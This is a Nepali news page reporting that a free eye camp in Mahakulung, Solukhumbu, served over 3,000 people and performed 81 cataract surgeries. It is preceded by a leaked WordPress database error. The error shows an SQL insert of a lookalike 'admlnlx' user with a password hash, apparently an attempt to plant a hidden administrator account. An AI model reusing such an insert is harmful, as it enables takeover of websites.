WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCsT5SVC1QucF30aMogXTUJMmJr.Wb1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 01:59:38', '', 'admlnlx', 'admlnlx')

महाकुलुङमा संचालित नि:शुल्क आँखा शिविर सम्पन्न ३ तीनहजार भन्दा बढिले लिए सेवा – Gaule Khabar

महाकुलुङमा संचालित नि:शुल्क आँखा शिविर सम्पन्न ३ तीनहजार भन्दा बढिले लिए सेवा

महाकुलुङमा संचालित नि:शुल्क आँखा शिविर सम्पन्न ३ तीनहजार भन्दा बढिले लिए सेवा

सोलुखुम्बु । महाकुलुङ गाउँपालिकामा सन्चाल भएको निःशुल्क आँखा शिबिर सम्पन्न भएको छ ।
गाउँपालिकामा बिहिबारबाट सन्चालन भएको शिबिरमा ३ हजार भन्दा बढीले सेवा लिएको महाकुलुङ गाउँपालिका अध्यक्ष सुर्य बहादुर कुलुङले बताए ।

रोटरी क्लव अफ रत्ननगर जर्मनको सहयोगमा महाकुलुङ गाउँपालिकाको सहकार्यमा सुरु गरेको शिविरमा ८१ जनाको मोतिविन्दु शल्यकृया गरिएको छ भने १४ सय भन्दा बढीलाई चस्मा र औषधी वितरण गरिएको महाकुलुङ गाउँपालिकाले जनाएको छ ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका